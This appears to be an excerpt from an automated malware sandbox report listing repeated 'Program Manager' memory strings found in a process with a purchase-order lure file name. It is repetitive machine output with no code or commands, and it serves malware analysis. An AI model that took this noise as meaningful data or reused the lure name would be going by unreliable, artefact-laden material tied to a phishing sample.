                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,,
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,V
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,U
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLt
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,T
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp%
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,I
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLh
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,G
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLf
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLd
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,B
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLq
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,Q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLp
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,P
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,N
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,K
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,y
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,u
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,t
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,r
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpC
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpA
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,}
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,{
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp-
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,i
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,f
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,d
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp0
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH<
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhY
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhE
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q${
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH+
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhJ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(5
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHR
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(1
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHQ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qho
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhn
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\_
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHD
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q($
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHA
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh`
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh_
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhm
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHM
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q('
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(U
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHp
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q([
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(Z
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHx
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHw
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHv
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(V
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(E
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHd
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHb
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(B
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHm
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHk
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHi
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(I
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(G
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(t
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL~
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql6
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q({
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(y
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(w
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql)
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql%
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql$
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(k
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(i
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD1
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD.
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD!
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd?
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd>
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd=
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDQ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$1
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdo
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDO
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDN
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$,
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0*
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDW
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$6
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDU
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDS
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$2
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdr
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD@
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd^
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd]
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD;
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd[
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDH
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDG
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdf
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDF
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$&
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdd
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$#
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdb
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDB
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDm
